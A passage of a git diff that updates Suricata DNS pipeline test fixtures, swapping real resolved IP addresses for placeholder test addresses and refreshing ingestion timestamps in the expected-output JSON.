+{"timestamp":"2019-08-22T23:48:48.901548+0000","flow_id":40074894954311,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":50720,"proto":"UDP","dns":{"version":2,"type":"answer","id":60273,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":270,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"}],"grouped":{"A":["175.16.199.1","175.16.199.1","175.16.199.1","175.16.199.1"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} +{"timestamp":"2019-08-22T23:48:48.902685+0000","flow_id":2130691028471842,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":41979,"proto":"UDP","dns":{"version":2,"type":"answer","id":4210,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":299,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"}],"grouped":{"AAAA":["2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","2a04:4e42:0200:0000:0000:0000:0000:0729","2a04:4e42:0400:0000:0000:0000:0000:0729"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} {"timestamp":"2019-08-23T01:22:31.812655+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":44773,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28329,"rrname":"www.yahoo.com","rrtype":"A","tx_id":0}} {"timestamp":"2019-08-23T01:22:31.812828+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":55246,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7050,"rrname":"www.yahoo.com","rrtype":"AAAA","tx_id":0}} {"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.yahoo.com","rrtype":"CNAME","ttl":1315,"rdata":"atsv2-fp-shed.wg1.b.yahoo.com"}} -{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"98.138.219.232"}} -{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"98.138.219.231"}} -{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"72.30.35.10"}} -{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"72.30.35.9"}} +{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}} +{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}} +{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}} +{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}} {"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.yahoo.com","rrtype":"CNAME","ttl":1268,"rdata":"atsv2-fp-shed.wg1.b.yahoo.com"}} -{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0058:1836:0000:0000:0000:0010"}} -{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0044:041d:0000:0000:0000:0003"}} -{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0058:1836:0000:0000:0000:0011"}} -{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0044:041d:0000:0000:0000:0004"}} +{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}} +{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}} +{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}} +{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}} {"timestamp":"2019-08-23T02:03:36.578089+0000","flow_id":2181951993205289,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":48288,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9104,"rrname":"www.elastic.co","rrtype":"A","tx_id":0}} {"timestamp":"2019-08-23T02:03:36.578262+0000","flow_id":928596784370390,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":59203,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12859,"rrname":"www.elastic.co","rrtype":"AAAA","tx_id":0}} -{"timestamp":"2019-08-23T02:03:36.619381+0000","flow_id":2181951993205289,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":48288,"proto":"UDP","dns":{"version":2,"type":"answer","id":9104,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":150,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.194.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.2.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.66.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.130.217"}]}} -{"timestamp":"2019-08-23T02:03:36.626559+0000","flow_id":928596784370390,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":59203,"proto":"UDP","dns":{"version":2,"type":"answer","id":12859,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":269,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0000:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0600:0000:0000:0000:0000:0729"}]}} +{"timestamp":"2019-08-23T02:03:36.619381+0000","flow_id":2181951993205289,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":48288,"proto":"UDP","dns":{"version":2,"type":"answer","id":9104,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":150,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"}]}} +{"timestamp":"2019-08-23T02:03:36.626559+0000","flow_id":928596784370390,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":59203,"proto":"UDP","dns":{"version":2,"type":"answer","id":12859,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":269,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}]}} diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json index a0fdf41a97d..549717e5874 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json @@ -51,7 +51,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853363600Z", + "ingested": "2021-12-09T13:45:26.597818200Z", "original": "{\"timestamp\":\"2019-08-22T23:48:27.924120+0000\",\"flow_id\":885455453886936,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":46686,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":51803,\"rrname\":\"google.com\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" @@ -114,7 +114,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853383600Z", + "ingested": "2021-12-09T13:45:26.597827300Z", "original": "{\"timestamp\":\"2019-08-22T23:48:27.924282+0000\",\"flow_id\":1418448010418810,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":36993,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":39523,\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -134,7 +134,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "2607:f8b0:4006:0805:0000:0000:0000:200e" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "question": { "name": "google.com", @@ -145,7 +145,7 @@ "answers": [ { "name": "google.com", - "data": "2607:f8b0:4006:0805:0000:0000:0000:200e", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 272 } @@ -175,7 +175,7 @@ }, "related": { "ip": [ - "2607:f8b0:4006:0805:0000:0000:0000:200e", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "10.0.2.3" ] }, @@ -194,8 +194,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853388500Z", - "original": "{\"timestamp\":\"2019-08-22T23:48:27.950946+0000\",\"flow_id\":1418448010418810,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":36993,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":39523,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"ttl\":272,\"rdata\":\"2607:f8b0:4006:0805:0000:0000:0000:200e\"}],\"grouped\":{\"AAAA\":[\"2607:f8b0:4006:0805:0000:0000:0000:200e\"]}}}", + "ingested": "2021-12-09T13:45:26.597894Z", + "original": "{\"timestamp\":\"2019-08-22T23:48:27.950946+0000\",\"flow_id\":1418448010418810,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":36993,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":39523,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"ttl\":272,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}],\"grouped\":{\"AAAA\":[\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"]}}}", "category": [ "network" ], @@ -214,7 +214,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "172.217.11.46" + "175.16.199.1" ], "question": { "name": "google.com", @@ -225,7 +225,7 @@ "answers": [ { "name": "google.com", - "data": "172.217.11.46", + "data": "175.16.199.1", "type": "A", "ttl": 299 } @@ -255,7 +255,7 @@ }, "related": { "ip": [ - "172.217.11.46", + "175.16.199.1", "10.0.2.3" ] }, @@ -274,8 +274,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853392400Z", - "original": "{\"timestamp\":\"2019-08-22T23:48:27.957906+0000\",\"flow_id\":885455453886936,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":46686,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":51803,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"google.com\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"google.com\",\"rrtype\":\"A\",\"ttl\":299,\"rdata\":\"172.217.11.46\"}],\"grouped\":{\"A\":[\"172.217.11.46\"]}}}", + "ingested": "2021-12-09T13:45:26.597898300Z", + "original": "{\"timestamp\":\"2019-08-22T23:48:27.957906+0000\",\"flow_id\":885455453886936,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":46686,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":51803,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"google.com\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"google.com\",\"rrtype\":\"A\",\"ttl\":299,\"rdata\":\"175.16.199.1\"}],\"grouped\":{\"A\":[\"175.16.199.1\"]}}}", "category": [ "network" ], @@ -338,7 +338,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853411800Z", + "ingested": "2021-12-09T13:45:26.597902800Z", "original": "{\"timestamp\":\"2019-08-22T23:48:48.839495+0000\",\"flow_id\":40074894954311,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":50720,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":60273,\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" @@ -402,7 +402,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853419Z", + "ingested": "2021-12-09T13:45:26.597914700Z", "original": "{\"timestamp\":\"2019-08-22T23:48:48.839714+0000\",\"flow_id\":2130691028471842,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":41979,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":4210,\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -422,10 +422,10 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "151.101.130.217", - "151.101.194.217", - "151.101.2.217", - "151.101.66.217" + "175.16.199.1", + "175.16.199.1", + "175.16.199.1", + "175.16.199.1" ], "question": { "name": "www.elastic.co", @@ -443,25 +443,25 @@ }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.130.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.194.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.2.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.66.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 } @@ -491,10 +491,7 @@ }, "related": { "ip": [ - "151.101.130.217", - "151.101.194.217", - "151.101.2.217", - "151.101.66.217", + "175.16.199.1", "10.0.2.3" ] }, @@ -513,8 +510,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853423800Z", - "original": "{\"timestamp\":\"2019-08-22T23:48:48.901548+0000\",\"flow_id\":40074894954311,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":50720,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":60273,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":270,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.130.217\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.194.217\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.2.217\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.66.217\"}],\"grouped\":{\"A\":[\"151.101.130.217\",\"151.101.194.217\",\"151.101.2.217\",\"151.101.66.217\"],\"CNAME\":[\"dualstack.r2.shared.global.fastly.net\"]}}}", + "ingested": "2021-12-09T13:45:26.597919500Z", + "original": "{\"timestamp\":\"2019-08-22T23:48:48.901548+0000\",\"flow_id\":40074894954311,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":50720,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":60273,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":270,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"}],\"grouped\":{\"A\":[\"175.16.199.1\",\"175.16.199.1\",\"175.16.199.1\",\"175.16.199.1\"],\"CNAME\":[\"dualstack.r2.shared.global.fastly.net\"]}}}", "category": [ "network" ], @@ -533,8 +530,8 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "2a04:4e42:0600:0000:0000:0000:0000:0729", - "2a04:4e42:0000:0000:0000:0000:0000:0729", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "2a04:4e42:0200:0000:0000:0000:0000:0729", "2a04:4e42:0400:0000:0000:0000:0000:0729" ], @@ -554,13 +551,13 @@ }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "2a04:4e42:0600:0000:0000:0000:0000:0729", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 29 }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "2a04:4e42:0000:0000:0000:0000:0000:0729", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 29 }, @@ -602,8 +599,7 @@ }, "related": { "ip": [ - "2a04:4e42:0600:0000:0000:0000:0000:0729", - "2a04:4e42:0000:0000:0000:0000:0000:0729", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "2a04:4e42:0200:0000:0000:0000:0000:0729", "2a04:4e42:0400:0000:0000:0000:0000:0729", "10.0.2.3" @@ -624,8 +620,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853427900Z", - "original": 